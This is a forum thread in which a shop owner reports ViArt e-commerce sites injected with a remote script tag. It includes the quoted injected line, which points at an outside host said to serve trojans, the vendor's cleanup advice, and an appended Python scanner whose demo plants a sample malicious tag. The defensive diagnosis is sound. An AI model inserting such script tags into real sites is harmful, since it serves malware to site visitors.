I've been testing this software with a view to upgrading a couple of other ecommerce sites to use it. All was going well until the other day, when I noticed that the sites I have up that use Viart have been compromised.
An example is at www.welovepostcards.co.uk. If you check the source of the page you'll see extra code dropped in right at the top of the page, linking to a loaded site (make sure you have antivirus etc. and it's up to date, as they appear loaded with trojans).
I only noticed this as my site styling suddenly went to pot and I was trying to work out what had caused it when I spotted these links and thought "that's nothing to do with me!!"
It must be a script somewhere, as it's coming up on each page. I've queried my hosting company and also Viart, but I want to try to resolve this ASAP.
I know it's only a Viart / PHP issue, as other sites with the same host are all fine. I've checked them through and they appear to be uncompromised.
Any help, advice or pointers would be appreciated.
Regards
S :)
foxtrotdomains.com
21 Jan 2009 1:54 PM
Is this note a responsibility of the hosting site?
I am just curious.
SajMalik
21 Jan 2009 3:14 PM
Do you mean the line:
<script type=text/javascript src=http://thewelbeck.com/c06.js></script>?
It's for a hotel in Blackpool - interesting hack?
life-of-brian (Guest)
21 Jan 2009 3:21 PM
That's exactly it, although it changes on a page-by-page basis, I've found, so it's pulling information from somewhere that I can't find.
Those pages also seem to have been compromised, as my antivirus picks up all sorts on some of the linked pages.
I just need to try to track down how they've got in, which I'm waiting for my host's help with, and then to find out what they're using to be able to do this, as it's only affecting sites that I run using Viart; all others are fine.
Very odd though, I've never seen a hack like this before.
S :)
Anjula
21 Jan 2009 3:40 PM
Hello,
Thanks for raising this issue. I will comment on this:
1. The issue you're talking about most probably has to do with attacks that take place due to gaining FTP access to the site and does not relate to the shop scripts.
2. We advise changing the FTP login details to the site as soon as you notice or suspect the hack attack. It is also recommended to change the Admin access details to the site.
3. The next step is to check all computers that had access to the site via FTP.
4. And lastly, remove the alien code that does not relate to ViArt code, or download a standard version of ViArt Shop from our site and replace the infected files with the standard ones.
With kind regards,
ViArt Support Team
freezer
22 Jan 2009 5:03 PM
With my limited knowledge, could you not see when the file which has had code added was last updated, and then maybe ask your ISP to check the logs to see if indeed the change was made via FTP at this time or, if not, what activity was taking place around then?
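
Added example, not part of the original thread and not ViArt code: a small Python scan that walks a web root, reports every `<script src=...>` tag loading from a host you have not allowed, and gives each file's modification time so it can be matched against the FTP log. The function names, file names and hostnames are assumptions made for the example, and the sample files are constructed.

```python
import os
import re
import tempfile
from datetime import datetime, timezone
from urllib.parse import urlparse

# Matches <script ... src=URL> with quoted or unquoted attribute values,
# the unquoted form being the one quoted in the thread.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl")


def find_external_scripts(root, allowed_hosts):
    """Return (path, mtime_utc, src) for script tags loading from hosts
    that are not in allowed_hosts. Relative URLs are treated as local."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
            for src in SCRIPT_SRC.findall(text):
                host = (urlparse(src).hostname or "").lower()
                if host and host not in allowed:
                    hits.append((path, mtime.isoformat(timespec="seconds"), src))
    return sorted(hits, key=lambda h: h[1])  # oldest change first


def demo():
    """Scan two constructed files (hostnames are made up for the example)."""
    with tempfile.TemporaryDirectory() as root:
        clean = '<script type="text/javascript" src="js/shop.js"></script>\n'
        bad = "<script type=text/javascript src=http://injected.example/c06.js></script>\n"
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(bad + clean)
        with open(os.path.join(root, "basket.php"), "w") as fh:
            fh.write(clean)
        hits = find_external_scripts(root, {"www.example-shop.test"})
        return [(os.path.basename(p), src) for p, _mtime, src in hits]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Modification times can be reset by whoever changed the file, so treat them as a lead to check against the FTP log rather than as proof of when the change happened.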